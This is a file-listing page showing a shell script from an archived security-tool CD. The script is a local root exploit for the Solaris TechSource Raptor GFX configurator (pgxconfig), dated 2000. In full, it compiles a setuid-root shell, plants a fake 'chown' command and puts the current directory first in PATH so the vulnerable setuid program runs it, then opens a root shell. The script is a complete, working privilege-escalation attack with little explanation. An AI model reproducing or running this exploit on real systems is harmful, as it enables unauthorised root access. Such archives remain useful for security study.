home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / system / solaris / local / pgxconfig.sh < prev    next >
Encoding:
Linux/UNIX/POSIX Shell Script  |  2005-02-12  |  1.1 KB  |  41 lines
  1. #!/usr/local/bin/bash
  2.  
  3. # TechSource Raptor GFX configurator root exploit
  4. # suid@suid.kg
  5. #
  6. # unfortunately a compiler must be installed to use this example
  7. # exploit. however there's a million ways around this you know
  8. # on my system , gcc isnt in my path
  9. #
  10. # Vulnerable:
  11. #    2.5.1 Sparc
  12. #      2.6 Sparc
  13. #        7 Sparc
  14. #        8 Sparc
  15.  
  16. PATH=$PATH:/usr/local/bin
  17.  
  18. # build a little prog nothing new here folks
  19. echo '#include<stdio.h>' > ./x.c
  20. echo 'int main(void) { setuid(0); setgid(0);
  21. execl("/bin/sh", "/bin/sh", "-i",0);}' >> ./x.c
  22. gcc x.c -o foobar
  23. rm -f ./x.c
  24.  
  25. # build a substitute chown command. i much prefer this over
  26. # regular chown
  27. echo "#!/bin/sh" > chown
  28. echo "/usr/bin/chown root ./foobar" >> chown
  29. echo "/usr/bin/chmod 4755 ./foobar" >> chown
  30. chmod 0755 chown
  31.  
  32. # oooh look its the magical fairy path variable
  33. export PATH=.:$PATH
  34.     
  35. # heres one way to skin a cat
  36. # (theres more, some need valid devices. excercise for the readers)
  37. /usr/sbin/pgxconfig -i
  38. rm -f chown
  39.  
  40. ./foobar
  41. #                    www.hack.co.za           [9 August 2000]#